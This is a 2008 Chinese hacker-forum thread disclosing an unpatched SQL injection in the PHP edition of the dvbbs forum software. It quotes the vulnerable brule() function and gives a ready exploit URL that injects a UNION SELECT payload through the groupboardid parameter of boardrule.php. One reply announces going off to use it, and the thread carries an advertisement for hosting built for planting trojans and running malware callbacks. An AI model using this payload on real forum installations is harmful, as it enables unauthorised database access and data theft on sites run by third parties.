315技术社区» 最新业内新闻 » 『0day预警资料库』 » dvbbs之PHP版本0day

返回列表回复发帖

管理员-庶民之子

Rank: 9 Rank: 9 Rank: 9

帖子: 664
威望: 0 点
T币: 44 个
警告: 0 次
活力: 404 点
性别: 男
来自: 北京
在线时间: 574 小时
注册时间: 2007-9-19
最后登录: 2008-12-29

论坛管理员勋章

1^#

字体大小: tT

发表于 2008-3-13 17:24 | 只看该作者

dvbbs之PHP版本0day

function brule() {
global $dv,$db,$boardid,$lang,$groupboardid;
$groupboardid=$_GET['groupboardid'];
if(!empty($_GET['groupboardid'])){
$rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");
}
else{
$rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");
}

复制代码

直接获得变量groupboardid，不为空就直接带入查询导致注入。

http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version()/*

复制代码

本主题由政政于 2008-3-13 17:34 分类

收藏分享评分

最新推出黑客免杀空间15元/月，支持ASP收信、挂马、上线等. 点击申请

回复引用

普通员工

Rank: 1

帖子: 20
威望: 0 点
T币: 2 个
警告: 0 次
活力: 18 点
在线时间: 3 小时
注册时间: 2008-4-1
最后登录: 2009-1-6

2^#

发表于 2008-4-1 21:08 | 只看该作者

顶顶顶好帖子,我现在就去刷

顶顶顶好帖子,我现在就去刷顶顶顶好帖子,我现在就去刷

回复引用

普通员工

Rank: 1

帖子: 20
威望: 0 点
T币: 2 个
警告: 0 次
活力: 18 点
在线时间: 3 小时
注册时间: 2008-4-1
最后登录: 2009-1-6

3^#

发表于 2008-4-1 21:08 | 只看该作者

好,的的我现在就去看看

好,的的我现在就去看看

回复引用

驱逐出境

帖子: 5
威望: 0 点
T币: 0 个
警告: 0 次
活力: 5 点
性别: 女
在线时间: 0 小时
注册时间: 2008-11-6
最后登录: 2008-12-30

4^#

发表于 2008-11-12 22:05 | 只看该作者

不容怀疑的数学

提示: 作者被禁止或删除内容自动屏蔽

回复引用